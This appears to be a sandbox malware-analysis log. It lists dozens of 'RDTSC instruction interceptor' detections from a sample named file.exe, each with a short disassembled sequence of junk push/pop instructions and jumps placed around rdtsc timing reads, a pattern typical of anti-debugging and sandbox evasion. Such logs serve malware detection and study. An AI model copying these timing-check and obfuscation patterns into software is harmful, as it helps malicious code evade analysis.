Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97D437 second address: 97D443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FFA70D2D1A6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97D5D1 second address: 97D5F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA707966E9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 983D52 second address: 983D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 983D57 second address: 983D62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FFA707966D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 983071 second address: 98307E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FFA70D2D1BAh 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 982754 second address: 982775 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jng 00007FFA707966D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FFA707966E1h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 982775 second address: 98277B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9835C4 second address: 9835C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9835C8 second address: 9835D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9835D1 second address: 9835E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA707966DEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9835E5 second address: 9835EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 983A3A second address: 983A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007FFA707966E9h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FFA707966DCh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 985E7C second address: 985E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FFA70D2D1A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 989013 second address: 98904C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FFA707966DAh 0x00000011 jnp 00007FFA707966D6h 0x00000017 popad 0x00000018 jmp 00007FFA707966DDh 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98904C second address: 989071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FFA70D2D1BDh 0x0000000e jmp 00007FFA70D2D1B1h 0x00000013 jl 00007FFA70D2D1A6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 989071 second address: 989090 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966E3h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jg 00007FFA707966D6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 988A86 second address: 988A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 988A8C second address: 988AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFA707966E4h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 988AA7 second address: 988AC5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFA70D2D1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FFA70D2D1ACh 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007FFA70D2D1A6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98CB8B second address: 98CB91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98CB91 second address: 98CB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99230E second address: 992322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FFA707966D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FFA707966EBh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 992322 second address: 99233A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA70D2D1AFh 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99233A second address: 992340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 992340 second address: 99234B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FFA70D2D1A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99234B second address: 992368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA707966E9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99116A second address: 991195 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA70D2D1B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FFA70D2D1ADh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 991195 second address: 9911A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9911A1 second address: 9911AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FFA70D2D1ACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9912DA second address: 9912DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 938900 second address: 938905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 938905 second address: 93890B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93890B second address: 93890F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9915B1 second address: 9915B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9952CF second address: 9952DB instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFA70D2D1AEh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 994B16 second address: 994B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 994B1C second address: 994B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 994B20 second address: 994B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 994B24 second address: 994B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFA70D2D1B9h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 994B45 second address: 994B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 994B49 second address: 994B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 994CD2 second address: 994CE6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FFA707966DEh 0x0000000c jng 00007FFA707966D6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 994CE6 second address: 994D28 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 jmp 00007FFA70D2D1AEh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jne 00007FFA70D2D1B2h 0x00000014 jmp 00007FFA70D2D1B1h 0x00000019 push eax 0x0000001a push edx 0x0000001b jc 00007FFA70D2D1A6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 999C1E second address: 999C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA707966E0h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 999C39 second address: 999C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 998FB8 second address: 998FDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FFA707966E8h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 998FDB second address: 998FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 998FE3 second address: 998FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 999286 second address: 99928A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99928A second address: 999290 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 999290 second address: 9992C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FFA70D2D1B6h 0x0000000c jmp 00007FFA70D2D1B2h 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9996B8 second address: 9996C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9996C2 second address: 9996CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9996CB second address: 9996D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9996D1 second address: 9996D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9996D5 second address: 9996DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 999803 second address: 999817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push edx 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007FFA70D2D1A6h 0x00000010 pop edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0C88 second address: 9A0C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0C8E second address: 9A0C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99EF8F second address: 99EF93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99F0DD second address: 99F0F1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFA70D2D1A8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FFA70D2D1A6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99F698 second address: 99F69E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99F69E second address: 99F6AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jne 00007FFA70D2D1ACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0171 second address: 9A0184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FFA707966D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FFA707966D6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0184 second address: 9A01A5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FFA70D2D1B6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A09DB second address: 9A09ED instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFA707966D8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FFA707966D6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A09ED second address: 9A09F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A5641 second address: 9A5659 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966E0h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A4810 second address: 9A4839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFA70D2D1B8h 0x00000008 jmp 00007FFA70D2D1ACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A4D62 second address: 9A4D85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966E9h 0x00000007 ja 00007FFA707966D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A51D0 second address: 9A51E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA70D2D1B2h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A51E8 second address: 9A51EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A5351 second address: 9A5355 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A5355 second address: 9A535F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A535F second address: 9A536A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A536A second address: 9A5374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AFEC9 second address: 9AFED5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FFA70D2D1A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AFED5 second address: 9AFED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B0178 second address: 9B017E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B017E second address: 9B0195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jns 00007FFA707966D6h 0x0000000c jmp 00007FFA707966DAh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B031D second address: 9B0358 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFA70D2D1BEh 0x00000008 jp 00007FFA70D2D1A6h 0x0000000e jmp 00007FFA70D2D1B2h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 jmp 00007FFA70D2D1B1h 0x0000001c push esi 0x0000001d pop esi 0x0000001e pop eax 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AF4E0 second address: 9AF4F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AF4F5 second address: 9AF4FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AF4FB second address: 9AF501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B3ADF second address: 9B3AF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA70D2D1B2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B3AF5 second address: 9B3B31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007FFA707966E6h 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B3B31 second address: 9B3B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA70D2D1B0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B3B45 second address: 9B3B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BA1F1 second address: 9BA1F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BA1F5 second address: 9BA205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jo 00007FFA707966D6h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C4F2C second address: 9C4F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C4F31 second address: 9C4F6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFA707966E7h 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007FFA707966D6h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FFA707966DAh 0x0000001a jg 00007FFA707966DAh 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C9FD4 second address: 9C9FDE instructions: 0x00000000 rdtsc 0x00000002 js 00007FFA70D2D1AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C9995 second address: 9C999A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C999A second address: 9C99B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA70D2D1AEh 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C9B4B second address: 9C9B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C9B51 second address: 9C9B7A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FFA70D2D1B7h 0x0000000d js 00007FFA70D2D1AEh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E20F3 second address: 9E2111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FFA707966E8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2111 second address: 9E2133 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA70D2D1ABh 0x00000007 jne 00007FFA70D2D1A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jg 00007FFA70D2D1C4h 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
